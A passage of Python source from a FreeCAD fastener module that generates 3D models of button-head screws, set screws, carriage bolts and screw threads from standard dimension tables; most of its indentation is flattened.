shell_thread = self.makeShellthread(d2, P, halfturns, True, 0)
shell_thread.translate(Base.Vector(0, 0, -2 * P))
# combine the top & threaded section
p_faces = p_shell.Faces
p_faces.extend(shell_thread.Faces)
p_shell = Part.Shell(p_faces)
# make a hole for a hex key in the head
hex_solid, hex_shell = self.makeAllen2(SW, l3 * 0.4, l3 + l1)
top_face = top_face.cut(hex_solid)
p_faces = p_shell.Faces
p_faces.extend(top_face.Faces)
hex_shell.translate(Base.Vector(0, 0, -1))
p_faces.extend(hex_shell.Faces)
p_shell = Part.Shell(p_faces)
screw = Part.Solid(p_shell)
# chamfer the hex recess
cham_p1 = Base.Vector(0, 0, l3 + l1)
cham_p2 = Base.Vector(SW / math.sqrt(3), 0, l3 + l1)
cham_p3 = Base.Vector(0, 0, l3 + l1 - SW / math.sqrt(3)) # 45 degree chamfer
cham_e1 = Part.makeLine(cham_p1, cham_p2)
cham_e2 = Part.makeLine(cham_p2, cham_p3)
cham_profile = Part.Wire([cham_e1, cham_e2])
cham_shell = cham_profile.revolve(Base.Vector(0, 0, 0), Base.Vector(0, 0, 1), 360)
cham_solid = Part.Solid(cham_shell)
screw = screw.cut(cham_solid)
return screw
# make ISO 7380-1 Button head Screw
# make ISO 7380-2 Button head Screw with collar
# make DIN 967 cross recessed pan head Screw with collar
def makeIso7380(self, SType='ISO7380-1', ThreadType='M6', l=25.0):
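        # Button head screws: for ISO 7380-1/-2 and ASME B18.3.3 the button arc
        # radius rH is derived from the head diameter dk, the head height and the
        # recess chamfer diameter e_cham; DIN 967 takes its radius rf directly
        # from the data table and uses a cross recess instead of a hex socket.
        # DIN 967, ISO 7380-2 and ASME B18.3.3B also get a collar.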
dia = self.getDia(ThreadType, False)
# todo: different radii for screws with thread to head or with shaft?
sqrt2_ = 1.0 / math.sqrt(2.0)
if SType == 'DIN967':
P, b, c, da, dk, r, k, rf, x, cT, mH, mZ = FsData["din967def"][ThreadType]
rH = rf # radius of button arc
alpha = math.acos((rf - k + c) / rf)
# Head Points
Pnt0 = Base.Vector(0.0, 0.0, k)
PntArc = Base.Vector(rf * math.sin(alpha / 2.0), 0.0,
k - rf + rf * math.cos(alpha / 2.0)) # arc-point of button
Pnt1 = Base.Vector(rf * math.sin(alpha), 0.0, c) # end of button arc
PntC0 = Base.Vector((dk) / 2.0, 0.0, c) # collar points
PntC2 = Base.Vector((dk) / 2.0, 0.0, 0.0) # collar points
Pnt4 = Base.Vector(dia / 2.0 + r, 0.0, 0.0) # start of fillet between head and shank
edge1 = Part.Arc(Pnt0, PntArc, Pnt1).toShape()
edgeC0 = Part.makeLine(Pnt1, PntC0)
edgeC1 = Part.makeLine(PntC0, PntC2)
edge2 = Part.Wire([edgeC0, edgeC1])
edge3 = Part.makeLine(PntC2, Pnt4)
# Points for recessShell cutter
PntH0 = Base.Vector(0.0, 0.0, 2.0 * k)
PntH1 = Base.Vector(rf * math.sin(alpha), 0.0, 2.0 * k)
recess, recessShell = self.makeCross_H3(cT, mH, k)
else:
if SType == 'ISO7380-1':
P, b, a, da, dk, dk_mean, s_mean, t_min, r, k, e, w = FsData["iso7380def"][ThreadType]
# Bottom of recess
e_cham = 2.0 * s_mean / math.sqrt(3.0) / 0.99
# depth = s_mean / 3.0
ak = -(4 * k ** 2 + e_cham ** 2 - dk ** 2) / (8 * k) # helper value for button arc
rH = math.sqrt((dk / 2.0) ** 2 + ak ** 2) # radius of button arc
alpha = (math.atan(2 * (k + ak) / e_cham) + math.atan((2 * ak) / dk)) / 2
Pnt2 = Base.Vector(rH * math.cos(alpha), 0.0, -ak + rH * math.sin(alpha)) # arc-point of button
Pnt3 = Base.Vector(dk / 2.0, 0.0, 0.0) # end of fillet
Pnt4 = Base.Vector(dia / 2.0 + r, 0.0, 0.0) # start of fillet between head and shank
edge3 = Part.makeLine(Pnt3, Pnt4)
if SType == 'ASMEB18.3.3A':
P, b, da, dk, s_mean, t_min, r, k = FsData["asmeb18.3.3adef"][ThreadType]
# Bottom of recess
e_cham = 2.0 * s_mean / math.sqrt(3.0) / 0.99
# depth = s_mean / 3.0
ak = -(4 * k ** 2 + e_cham ** 2 - dk ** 2) / (8 * k) # helper value for button arc
rH = math.sqrt((dk / 2.0) ** 2 + ak ** 2) # radius of button arc
alpha = (math.atan(2 * (k + ak) / e_cham) + math.atan((2 * ak) / dk)) / 2
Pnt2 = Base.Vector(rH * math.cos(alpha), 0.0, -ak + rH * math.sin(alpha)) # arc-point of button
Pnt3 = Base.Vector(dk / 2.0, 0.0, 0.0) # end of fillet
Pnt4 = Base.Vector(dia / 2.0 + r, 0.0, 0.0) # start of fillet between head and shank
edge3 = Part.makeLine(Pnt3, Pnt4)
if SType == 'ISO7380-2' or SType == 'ASMEB18.3.3B':
if SType == 'ISO7380-2':
P, b, c, da, dk, dk_c, s_mean, t_min, r, k, e, w = FsData["iso7380_2def"][ThreadType]
if SType == 'ASMEB18.3.3B':
P, b, c, dk, dk_c, s_mean, t_min, r, k = FsData["asmeb18.3.3bdef"][ThreadType]
# Bottom of recess
e_cham = 2.0 * s_mean / math.sqrt(3.0) / 0.99
# depth = s_mean / 3.0
ak = -(4 * (k - c) ** 2 + e_cham ** 2 - dk ** 2) / (8 * (k - c)) # helper value for button arc
rH = math.sqrt((dk / 2.0) ** 2 + ak ** 2) # radius of button arc
alpha = (math.atan(2 * (k - c + ak) / e_cham) + math.atan((2 * ak) / dk)) / 2
Pnt2 = Base.Vector(rH * math.cos(alpha), 0.0, c - ak + rH * math.sin(alpha)) # arc-point of button
Pnt3 = Base.Vector(dk / 2.0, 0.0, c) # end of fillet
Pnt4 = Base.Vector(dia / 2.0 + r, 0.0, 0.0) # start of fillet between head and shank
PntC0 = Base.Vector((dk_c - c) / 2.0, 0.0, c) # collar points
PntC1 = Base.Vector(dk_c / 2.0, 0.0, c / 2.0) # collar points
PntC2 = Base.Vector((dk_c - c) / 2.0, 0.0, 0.0) # collar points
edgeC0 = Part.makeLine(Pnt3, PntC0)
edgeC1 = Part.Arc(PntC0, PntC1, PntC2).toShape()
edge3 = Part.makeLine(PntC2, Pnt4)
edge3 = Part.Wire([edgeC0, edgeC1, edge3])
# Head Points
Pnt0 = Base.Vector(e_cham / 4.0, 0.0, k - e_cham / 4.0) # Center Point for chamfer
Pnt1 = Base.Vector(e_cham / 2.0, 0.0, k) # inner chamfer edge at head
# Points for recessShell cutter
PntH0 = Base.Vector(e_cham / 4.0, 0.0, 2.0 * k)
PntH1 = Base.Vector(e_cham / 2.0, 0.0, 2.0 * k)
edge1 = Part.makeLine(Pnt0, Pnt1)
edge2 = Part.Arc(Pnt1, Pnt2, Pnt3).toShape()
recess, recessShell = self.makeAllen2(s_mean, t_min, k)
if b > l - 1.0 * P:
bmax = l - 1.0 * P
else:
bmax = b
        ### determine the number of thread half turns with math.modf
residue, turns = math.modf((bmax) / P)
halfturns = 2 * int(turns)
if residue < 0.5:
a_point = l - (turns + 1.0) * P
halfturns = halfturns + 1
else:
halfturns = halfturns + 2
a_point = l - (turns + 2.0) * P
offSet = r - a_point
Pnt5 = Base.Vector(dia / 2.0 + r - r * sqrt2_, 0.0, -r + r * sqrt2_) # arc-point of fillet
Pnt6 = Base.Vector(dia / 2.0, 0.0, -r) # end of fillet
Pnt7 = Base.Vector(dia / 2.0, 0.0, -a_point) # start of thread
edge4 = Part.Arc(Pnt4, Pnt5, Pnt6).toShape()
edge5 = Part.makeLine(Pnt6, Pnt7)
if SType == 'DIN967':
# bolt points
PntB1 = Base.Vector(dia / 2.0, 0.0, -l)
PntB2 = Base.Vector(0.0, 0.0, -l)
edgeB2 = Part.makeLine(PntB1, PntB2)
else:
# bolt points
cham_b = P * math.sqrt(3.0) / 2.0 * 17.0 / 24.0
PntB1 = Base.Vector(dia / 2.0, 0.0, -l + cham_b)
PntB2 = Base.Vector(dia / 2.0 - cham_b, 0.0, -l)
PntB3 = Base.Vector(0.0, 0.0, -l)
edgeB2 = Part.makeLine(PntB1, PntB2)
edgeB3 = Part.makeLine(PntB2, PntB3)
edgeB2 = Part.Wire([edgeB2, edgeB3])
if self.rThread:
aWire = Part.Wire([edge2, edge3, edge4])
else:
if a_point <= r:
edgeB1 = Part.makeLine(Pnt6, PntB1)
aWire = Part.Wire([edge2, edge3, edge4, edgeB1, edgeB2])
else:
edge5 = Part.makeLine(Pnt6, Pnt7)
edgeB1 = Part.makeLine(Pnt7, PntB1)
aWire = Part.Wire([edge2, edge3, edge4, edge5, edgeB1, edgeB2])
# Part.show(aWire)
headShell = aWire.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360)
# Part.show(headShell)
headFaces = headShell.Faces
edgeH1 = Part.makeLine(Pnt1, PntH1)
edgeH2 = Part.makeLine(PntH1, PntH0)
edgeH3 = Part.makeLine(PntH0, Pnt0)
hWire = Part.Wire([edge1, edgeH1, edgeH2, edgeH3]) # Cutter for recess-Shell
hFace = Part.Face(hWire)
hCut = hFace.revolve(Base.Vector(0.0, 0.0, 0.0), Base.Vector(0.0, 0.0, 1.0), 360)
# Part.show(hWire)
topFace = hCut.Faces[0]
recessShell = recessShell.cut(hCut)
topFace = topFace.cut(recess)
# Part.show(topFace)
# Part.show(recessShell)
# Part.show(headShell)
headFaces.append(topFace.Faces[0])
headFaces.extend(recessShell.Faces)
if self.rThread:
# if (dia < 3.0) or (dia > 5.0):
if True:
if SType == 'DIN967':
rthread = self.makeShellthread(dia, P, halfturns, False, offSet)
else:
rthread = self.makeShellthread(dia, P, halfturns, True, offSet)
rthread.translate(Base.Vector(0.0, 0.0, -a_point - 2.0 * P))
for threadFace in rthread.Faces:
headFaces.append(threadFace)
screwShell = Part.Shell(headFaces)
screw = Part.Solid(screwShell)
else:
rthread = self.makeShellthread(dia, P, halfturns, False, offSet)
rthread.translate(Base.Vector(0.0, 0.0, -a_point - 2.0 * P))
for threadFace in rthread.Faces:
headFaces.append(threadFace)
screwShell = Part.Shell(headFaces)
screw = Part.Solid(screwShell)
cyl = self.cutChamfer(dia, P, l)
screw = screw.cut(cyl)
else:
screwShell = Part.Shell(headFaces)
screw = Part.Solid(screwShell)
return screw
    # make ISO 4026 Hexagon socket set screws with flat point
    # also used for ISO 4027 (cone point), ISO 4028 (dog point) and
    # ISO 4029 (cup point) set screws, and ASME B18.3.5 set screws
def makeIso4026(self, SType='ISO4026', Threadtype='M6', l=16):
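        # Socket set screws: SType selects the point geometry (flat, cone, dog
        # or cup point); a hex recess with a 45 degree chamfer is cut into the
        # top, and a modelled thread is produced by intersecting the body with a
        # capped thread solid (screw.common(thread_solid)).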
if SType == 'ISO4026' or SType == 'ISO4027' or SType == 'ISO4029':
P, t, dp, dt, df, s = FsData["iso4026def"][Threadtype]
elif SType == 'ISO4028':
P, t, dp, df, z, s = FsData["iso4028def"][Threadtype]
elif SType[:-1] == 'ASMEB18.3.5':
P, t, dp, dt, df, s, z = FsData["asmeb18.3.5def"][Threadtype]
d = self.getDia(Threadtype, False)
d = d * 1.01
# generate the profile of the set-screw
if SType == 'ISO4026' or SType == 'ASMEB18.3.5A':
p0 = Base.Vector(0, 0, 0)
p1 = Base.Vector(df / 2, 0, 0)
p2 = Base.Vector(d / 2, 0, -1 * ((d - df) / 2))
p3 = Base.Vector(d / 2, 0, -1 * l + ((d - dp) / 2))
p4 = Base.Vector(dp / 2, 0, -1 * l)
p5 = Base.Vector(0, 0, -1 * l)
e1 = Part.makeLine(p0, p1)
e2 = Part.makeLine(p1, p2)
e3 = Part.makeLine(p2, p3)
e4 = Part.makeLine(p3, p4)
e5 = Part.makeLine(p4, p5)
p_profile = Part.Wire([e2, e3, e4, e5])
elif SType == 'ISO4027' or SType == 'ASMEB18.3.5B':
p0 = Base.Vector(0, 0, 0)
p1 = Base.Vector(df / 2, 0, 0)
p2 = Base.Vector(d / 2, 0, -1 * ((d - df) / 2))
p3 = Base.Vector(d / 2, 0, -1 * l + ((d - dt) / 2))
p4 = Base.Vector(dt / 2, 0, -1 * l)
p5 = Base.Vector(0, 0, -1 * l)
e1 = Part.makeLine(p0, p1)
e2 = Part.makeLine(p1, p2)
e3 = Part.makeLine(p2, p3)
e4 = Part.makeLine(p3, p4)
e5 = Part.makeLine(p4, p5)
p_profile = Part.Wire([e2, e3, e4, e5])
elif SType == 'ISO4028' or SType == 'ASMEB18.3.5C':
            # The shortest available dog-point set screws often have shorter
            # dog points. There is not much hard data available for this, so
            # approximate by halving the dog length for short screws.
if l < 1.5 * d:
z = z * 0.5
p0 = Base.Vector(0, 0, 0)
p1 = Base.Vector(df / 2, 0, 0)
p2 = Base.Vector(d / 2, 0, -1 * ((d - df) / 2))
p3 = Base.Vector(d / 2, 0, -1 * l + ((d - dp) / 2 + z))
p4 = Base.Vector(dp / 2, 0, -1 * l + z)
p5 = Base.Vector(dp / 2, 0, -1 * l)
p6 = Base.Vector(0, 0, -1 * l)
e1 = Part.makeLine(p0, p1)
e2 = Part.makeLine(p1, p2)
e3 = Part.makeLine(p2, p3)
e4 = Part.makeLine(p3, p4)
e5 = Part.makeLine(p4, p5)
e6 = Part.makeLine(p5, p6)
p_profile = Part.Wire([e2, e3, e4, e5, e6])
elif SType == 'ISO4029' or SType == 'ASMEB18.3.5D':
p0 = Base.Vector(0, 0, 0)
p1 = Base.Vector(df / 2, 0, 0)
p2 = Base.Vector(d / 2, 0, -1 * ((d - df) / 2))
p3 = Base.Vector(d / 2, 0, -1 * l + ((d - dp) / 2))
p4 = Base.Vector(dp / 2, 0, -1 * l)
p5 = Base.Vector(0, 0, -1 * l + math.sqrt(3) / 6 * dp)
e1 = Part.makeLine(p0, p1)
e2 = Part.makeLine(p1, p2)
e3 = Part.makeLine(p2, p3)
e4 = Part.makeLine(p3, p4)
e5 = Part.makeLine(p4, p5)
p_profile = Part.Wire([e2, e3, e4, e5])
p_shell = p_profile.revolve(Base.Vector(0, 0, 0), Base.Vector(0, 0, 1), 360)
# generate a top face with a hex-key recess
top_face_profile = Part.Wire([e1])
top_face = top_face_profile.revolve(Base.Vector(0, 0, 0), Base.Vector(0, 0, 1), 360)
hex_solid, hex_shell = self.makeAllen2(s, t - 1, 0)
top_face = top_face.cut(hex_solid)
p_faces = p_shell.Faces
p_faces.extend(top_face.Faces)
hex_shell.translate(Base.Vector(0, 0, -1))
p_faces.extend(hex_shell.Faces)
p_shell = Part.Shell(p_faces)
screw = Part.Solid(p_shell)
# chamfer the hex recess
cham_p1 = Base.Vector(0, 0, 0)
cham_p2 = Base.Vector(s / math.sqrt(3), 0, 0)
cham_p3 = Base.Vector(0, 0, 0 - s / math.sqrt(3)) # 45 degree chamfer
cham_e1 = Part.makeLine(cham_p1, cham_p2)
cham_e2 = Part.makeLine(cham_p2, cham_p3)
cham_profile = Part.Wire([cham_e1, cham_e2])
cham_shell = cham_profile.revolve(Base.Vector(0, 0, 0), Base.Vector(0, 0, 1), 360)
cham_solid = Part.Solid(cham_shell)
screw = screw.cut(cham_solid)
# produce a modelled thread if necessary
if self.rThread:
# calculate the number of thread half turns
residue, turns = math.modf((l) / P)
halfturns = 2 * int(turns)
if residue > 0.5:
halfturns = halfturns + 9
else:
halfturns = halfturns + 8
# make the threaded section
d = d / 1.01
shell_thread = self.makeShellthread(d, P, halfturns, False, 0)
thr_p1 = Base.Vector(0, 0, 2 * P)
thr_p2 = Base.Vector(d / 2, 0, 2 * P)
thr_e1 = Part.makeLine(thr_p1, thr_p2)
thr_cap_profile = Part.Wire([thr_e1])
thr_cap = thr_cap_profile.revolve(Base.Vector(0, 0, 0), Base.Vector(0, 0, 1), 360)
thr_faces = shell_thread.Faces
thr_faces.extend(thr_cap.Faces)
thread_shell = Part.Shell(thr_faces)
thread_solid = Part.Solid(thread_shell)
thread_solid.translate(Base.Vector(0, 0, 2 * P))
# Part.show(thread_solid)
screw = screw.common(thread_solid)
return screw
def makeCarriageBolt(self, SType='ASMEB18.5.2', Threadtype='1/4in', l=25.4):
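        # Carriage bolts: the ASME B18.5 table values are in inches and are
        # converted to millimetres (factor 25.4, pitch = 25.4 / tpi). The domed
        # head and shank are revolved, and the square neck under the head is
        # produced by cutting four boxes rotated 90 degrees apart.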
d = self.getDia(Threadtype, False)
if SType == 'ASMEB18.5.2':
tpi, _, A, H, O, P, _, _ = FsData["asmeb18.5.2def"][Threadtype]
A, H, O, P = (25.4 * x for x in (A, H, O, P))
pitch = 25.4 / tpi
if l <= 152.4:
L_t = d * 2 + 6.35
else:
L_t = d * 2 + 12.7
# lay out points for head generation
p1 = Base.Vector(0, 0, H)
head_r = A / math.sqrt(2)
p2 = Base.Vector(head_r * math.sin(math.pi / 8), 0, H - head_r + head_r * math.cos(math.pi / 8))
p3 = Base.Vector(A / 2, 0, 0)
p4 = Base.Vector(math.sqrt(2) / 2 * O, 0, 0)
p5 = Base.Vector(math.sqrt(2) / 2 * O, 0, -1 * P + (math.sqrt(2) / 2 * O - d / 2))
p6 = Base.Vector(d / 2, 0, -1 * P)
# arcs must be converted to shapes in order to be merged with other line segments
a1 = Part.Arc(p1, p2, p3).toShape()
l2 = Part.makeLine(p3, p4)
l3 = Part.makeLine(p4, p5)
l4 = Part.makeLine(p5, p6)
wire1 = Part.Wire([a1, l2, l3, l4])
head_shell = wire1.revolve(Base.Vector(0, 0, 0), Base.Vector(0, 0, 1), 360)
if not self.rThread:
# simplified threaded section
p7 = Base.Vector(d / 2, 0, -1 * l + d / 10)
p8 = Base.Vector(d / 2 - d / 10, 0, -1 * l)
p9 = Base.Vector(0, 0, -1 * l)
l5 = Part.makeLine(p6, p7)
l6 = Part.makeLine(p7, p8)
l7 = Part.makeLine(p8, p9)
thread_profile_wire = Part.Wire([l5, l6, l7])
shell_thread = thread_profile_wire.revolve(Base.Vector(0, 0, 0), Base.Vector(0, 0, 1), 360)
else:
# modeled threaded section
# calculate the number of thread half turns
if l <= L_t: # fully threaded fastener
residue, turns = math.modf((l - P) / pitch)
halfturns = 2 * int(turns)
if residue > 0.5:
halfturns = halfturns + 1
shell_thread = self.makeShellthread(d, pitch, halfturns, False, 0)
shell_thread.translate(Base.Vector(0, 0, -2 * pitch - P))
else: # partially threaded fastener
residue, turns = math.modf((L_t - P) / pitch)
halfturns = 2 * int(turns)
if residue > 0.5:
halfturns = halfturns + 1
shell_thread = self.makeShellthread(d, pitch, halfturns, False, 0)
shell_thread.translate(Base.Vector(0, 0, -2 * pitch - P - (l - L_t)))
p7 = Base.Vector(d / 2, 0, -1 * P - (l - L_t))
helper_wire = Part.Wire([Part.makeLine(p6, p7)])
shank = helper_wire.revolve(Base.Vector(0, 0, 0), Base.Vector(0, 0, 1), 360)
shell_thread = Part.Shell(shell_thread.Faces + shank.Faces)
p_shell = Part.Shell(head_shell.Faces + shell_thread.Faces)
p_solid = Part.Solid(p_shell)
# cut 4 flats under the head
for i in range(4):
p_solid = p_solid.cut(
Part.makeBox(d, A, P, Base.Vector(d / 2, -1 * A / 2, -1 * P)).rotate(Base.Vector(0, 0, 0),
Base.Vector(0, 0, 1), i * 90))
# removeSplitter is equivalent to the 'Refine' option for FreeCAD PartDesign objects
return p_solid.removeSplitter()
def makeHextool(self, s_hex, k_hex, cir_hex):
# makes a cylinder with an inner hex hole, used as cutting tool
# create hexagon face
mhex = Base.Matrix()
mhex.rotateZ(math.radians(60.0))
polygon = []
vhex = Base.Vector(s_hex / math.sqrt(3.0), 0.0, -k_hex * 0.1)
for i in range(6):
polygon.append(vhex)
vhex = mhex.multiply(vhex)
polygon.append(vhex)
hexagon = Part.makePolygon(polygon)
hexagon = Part.Face(hexagon)
# create circle face
circ = Part.makeCircle(cir_hex / 2.0, Base.Vector(0.0, 0.0, -k_hex * 0.1))
circ = Part.Face(Part.Wire(circ))
# Create the face with the circle as outline and the hexagon as hole
face = circ.cut(hexagon)
# Extrude in z to create the final cutting tool
exHex = face.extrude(Base.Vector(0.0, 0.0, k_hex * 1.2))
# Part.show(exHex)
return exHex
def makeShellthread(self, dia, P, hrots, withcham, offset):
"""
Construct a 60 degree screw thread with diameter dia,
pitch P, and length approximately equal to hrots*P/2.
if withcham == True, the end of the thread is nicely chamfered.
The thread is constructed z-up, as a shell, with the top circular
face removed. The top of the shell is centered @ (0,0,2*P-offset)
"""
# make a cylindrical solid, then cut the thread profile from it
H = math.sqrt(3) / 2 * P
# move the very bottom of the base up a tiny amount
# prevents some too-small edges from being created
correction = 1e-5
base_pnts = list(map(lambda x: Base.Vector(x),
[
[dia / 2, 0, 2 * P - offset],
[dia / 2, 0, -1 * (hrots - 2) * P / 2 + P / 2],
[dia / 2 - P / 2, 0, -1 * (hrots - 2) * P / 2 + correction],
[0, 0, -1 * (hrots - 2) * P / 2 + correction],
[0, 0, 2 * P - offset],
[dia / 2, 0, -1 * (hrots - 2) * P / 2 + correction]
]))
if withcham:
base_profile = Part.Wire([
Part.makeLine(base_pnts[0], base_pnts[1]),
Part.makeLine(base_pnts[1], base_pnts[2]),
Part.makeLine(base_pnts[2], base_pnts[3]),
Part.makeLine(base_pnts[3], base_pnts[4]),
Part.makeLine(base_pnts[4], base_pnts[0]),
])
else:
base_profile = Part.Wire([
Part.makeLine(base_pnts[0], base_pnts[5]),
Part.makeLine(base_pnts[5], base_pnts[3]),
Part.makeLine(base_pnts[3], base_pnts[4]),
Part.makeLine(base_pnts[4], base_pnts[0]),
])
base_shell = base_profile.revolve(
Base.Vector(0, 0, 0),
Base.Vector(0, 0, 1),
360)
base_body = Part.makeSolid(base_shell)
# create a sketch profile of the thread
# ref: https://en.wikipedia.org/wiki/ISO_metric_screw_thread
fillet_r = P * math.sqrt(3) / 12
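        # fillet_r = H / 6 with H = sqrt(3)/2 * P (the fundamental thread
        # height); it rounds the thread root in the swept profile below.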
helix_height = (hrots + 2) * P / 2
pnts = list(map(lambda x: Base.Vector(x),
[
[dia / 2 + math.sqrt(3) * 3 / 80 * P, 0, -0.475 * P],
[dia / 2 - 0.625 * H, 0, -1 * P / 8],
[dia / 2 - 0.625 * H - 0.5 * fillet_r, 0, 0],
[dia / 2 - 0.625 * H, 0, P / 8],
[dia / 2 + math.sqrt(3) * 3 / 80 * P, 0, 0.475 * P]
]))
thread_profile_wire = Part.Wire([
Part.makeLine(pnts[0], pnts[1]),
Part.Arc(pnts[3], pnts[2], pnts[1]).toShape(),
Part.makeLine(pnts[3], pnts[4]),
Part.makeLine(pnts[4], pnts[0])])
thread_profile_wire.translate(Base.Vector(0, 0, -1 * helix_height))
# make the helical paths to sweep along
# NOTE: makeLongHelix creates slightly conical
# helices unless the 4th parameter is set to 0!
main_helix = Part.makeLongHelix(P, helix_height, dia / 2, 0)
lead_out_helix = Part.makeHelix(P, P / 2, dia / 2 + 0.5 * (5 / 8 * H + 0.5 * fillet_r))
main_helix.rotate(Base.Vector(0, 0, 0), Base.Vector(1, 0, 0), 180)
lead_out_helix.translate(Base.Vector(0.5 * (-1 * (5 / 8 * H + 0.5 * fillet_r)), 0, 0))
sweep_path = Part.Wire([main_helix, lead_out_helix])
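        # The short lead-out helix has a slightly larger radius, so over the
        # final half pitch the swept profile moves radially outward and the
        # thread runs out smoothly instead of ending in a sharp step.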
# use Part.BrepOffsetAPI to sweep the thread profile
# ref: https://forum.freecadweb.org/viewtopic.php?t=21636#p168339
sweep = Part.BRepOffsetAPI.MakePipeShell(sweep_path)
sweep.setFrenetMode(True)
sweep.setTransitionMode(1) # right corner transition
sweep.add(thread_profile_wire)
if sweep.isReady():
sweep.build()
else:
            # geometry couldn't be generated in a usable form
raise RuntimeError("Failed to create shell thread: could not sweep thread")
sweep.makeSolid()
swept_solid = sweep.shape()
# translate swept path slightly for backwards compatibility
swept_solid.translate(Base.Vector(0, 0, P / 2 + P / 16))
# perform the actual boolean operations
base_body.rotate(Base.Vector(0, 0, 0), Base.Vector(0, 0, 1), 90)
threaded_solid = base_body.cut(swept_solid)
if offset > P:
# one more component: a kind of 'cap' to improve behaviour with
# large offset values
cap_bottom_point = Base.Vector(0, 0, 2 * P - offset - dia / 2)
cap_profile = Part.Wire([
Part.makeLine(base_pnts[4], base_pnts[0]),
Part.makeLine(base_pnts[0], cap_bottom_point),
Part.makeLine(cap_bottom_point, base_pnts[4])])
cap_shell = cap_profile.revolve(
Base.Vector(0, 0, 0),
Base.Vector(0, 0, 1),
360)
cap_solid = Part.makeSolid(cap_shell)
threaded_solid = threaded_solid.fuse(cap_solid)
            threaded_solid = threaded_solid.removeSplitter()  # refine the solid after the fuse
# remove top face(s) and convert to a shell
result = Part.Shell([x for x in threaded_solid.Faces \
if not abs(x.CenterOfMass[2] - (2 * P - offset)) < 1e-7])
return result
    # if da is not None: make a thread shell for a nut; otherwise make a screw tap (solid cutter)
def makeInnerThread_2(self, d, P, rotations, da, l):
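        # Sweep one turn of the internal thread profile along a single-pitch
        # helix, then stack translated copies of the resulting shell up to the
        # requested number of rotations. With da = None the faces are closed
        # into a solid usable as a thread cutter (screw tap); otherwise
        # chamfered end turns are added and an open thread shell for a nut is
        # returned.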
d = float(d)
bot_off = 0.0 # nominal length
if d > 52.0:
fuzzyValue = 5e-5
else:
fuzzyValue = 0.0
H = P * math.cos(math.radians(30)) # Thread depth H
r = d / 2.0
helix = Part.makeHelix(P, P, d * self.Tuner / 1000.0, 0) # make just one turn, length is identical to pitch
helix.translate(FreeCAD.Vector(0.0, 0.0, -P * 9.0 / 16.0))
extra_rad = P
# points for inner thread profile
ps0 = (r, 0.0, 0.0)
ps1 = (r - H * 5.0 / 8.0, 0.0, -P * 5.0 / 16.0)
ps2 = (r - H * 5.0 / 8.0, 0.0, -P * 9.0 / 16.0)
ps3 = (r, 0.0, -P * 14.0 / 16.0)
ps4 = (r + H * 1 / 24.0, 0.0, -P * 31.0 / 32.0) # Center of Arc
ps5 = (r, 0.0, -P)
ps6 = (r + extra_rad, 0.0, -P)
ps7 = (r + extra_rad, 0.0, 0.0)
edge0 = Part.makeLine(ps0, ps1)
edge1 = Part.makeLine(ps1, ps2)
edge2 = Part.makeLine(ps2, ps3)
edge3 = Part.Arc(FreeCAD.Vector(ps3), FreeCAD.Vector(ps4), FreeCAD.Vector(ps5)).toShape()
edge4 = Part.makeLine(ps5, ps6)
edge5 = Part.makeLine(ps6, ps7)
edge6 = Part.makeLine(ps7, ps0)
W0 = Part.Wire([edge0, edge1, edge2, edge3, edge4, edge5, edge6])
# Part.show(W0, 'W0')
makeSolid = True
isFrenet = True
pipe0 = Part.Wire(helix).makePipeShell([W0], makeSolid, isFrenet)
# pipe1 = pipe0.copy()
TheFaces = []
TheFaces.append(pipe0.Faces[0])
TheFaces.append(pipe0.Faces[1])
TheFaces.append(pipe0.Faces[2])
TheFaces.append(pipe0.Faces[3])
# topHeliFaces = [pipe0.Faces[6], pipe0.Faces[8]]
# innerHeliFaces = [pipe0.Faces[5]]
# bottomFaces = [pipe0.Faces[4], pipe0.Faces[7]]
TheShell = Part.Shell(TheFaces)
# singleThreadShell = TheShell.copy()
# print "Shellpoints: ", len(TheShell.Vertexes)
if da is None:
commonbox = Part.makeBox(d + 4.0 * P, d + 4.0 * P, 3.0 * P)
commonbox.translate(FreeCAD.Vector(-(d + 4.0 * P) / 2.0, -(d + 4.0 * P) / 2.0, -(3.0) * P))
topShell = TheShell.common(commonbox)
top_edges = []
top_z = -1.0e-5
for kante in topShell.Edges:
if kante.Vertexes[0].Point.z >= top_z and kante.Vertexes[1].Point.z >= top_z:
top_edges.append(kante)
# Part.show(kante)
top_wire = Part.Wire(Part.__sortEdges__(top_edges))
top_face = Part.Face(top_wire)
TheFaces = [top_face.Faces[0]]
TheFaces.extend(topShell.Faces)
for i in range(rotations - 2):
TheShell.translate(FreeCAD.Vector(0.0, 0.0, - P))
for flaeche in TheShell.Faces:
TheFaces.append(flaeche)
# FreeCAD.Console.PrintMessage("Base-Shell: " + str(i) + "\n")
# Make separate faces for the tip of the screw
botFaces = []
for i in range(rotations - 2, rotations, 1):
TheShell.translate(FreeCAD.Vector(0.0, 0.0, - P))
for flaeche in TheShell.Faces:
botFaces.append(flaeche)
# FreeCAD.Console.PrintMessage("Bottom-Shell: " + str(i) + "\n")
# FreeCAD.Console.PrintMessage("without chamfer: " + str(i) + "\n")
commonbox = Part.makeBox(d + 4.0 * P, d + 4.0 * P, 3.0 * P)
commonbox.translate(FreeCAD.Vector(-(d + 4.0 * P) / 2.0, -(d + 4.0 * P) / 2.0, -(rotations) * P + bot_off))
# commonbox.translate(FreeCAD.Vector(-(d+4.0*P)/2.0, -(d+4.0*P)/2.0,-(rotations+3)*P+bot_off))
# Part.show(commonbox)
BotShell = Part.Shell(botFaces)
# Part.show(BotShell)
BotShell = BotShell.common(commonbox)
# BotShell = BotShell.cut(commonbox)
bot_edges = []
bot_z = 1.0e-5 - (rotations) * P + bot_off
for kante in BotShell.Edges:
if kante.Vertexes[0].Point.z <= bot_z and kante.Vertexes[1].Point.z <= bot_z:
bot_edges.append(kante)
# Part.show(kante)
bot_wire = Part.Wire(Part.__sortEdges__(bot_edges))
bot_face = Part.Face(bot_wire)
bot_face.reverse()
for flaeche in BotShell.Faces:
TheFaces.append(flaeche)
# if da is not None:
# for flaeche in cham_Shell.Faces:
# TheFaces.append(flaeche)
# else:
TheFaces.append(bot_face)
TheShell = Part.Shell(TheFaces)
TheSolid = Part.Solid(TheShell)
# print self.Tuner, " ", TheShell.ShapeType, " ", TheShell.isValid(), " rotations: ", rotations, " Shellpoints: ", len(TheShell.Vertexes)
return TheSolid
else:
# Try to make the inner thread shell of a nut
cham_i = 2 * H * math.tan(math.radians(15.0)) # inner chamfer
# points for chamfer: cut-Method
pch0 = (da / 2.0 - 2 * H, 0.0, +cham_i) # bottom chamfer
pch1 = (da / 2.0, 0.0, 0.0) #
pch2 = (da / 2.0, 0.0, - 2.1 * P)
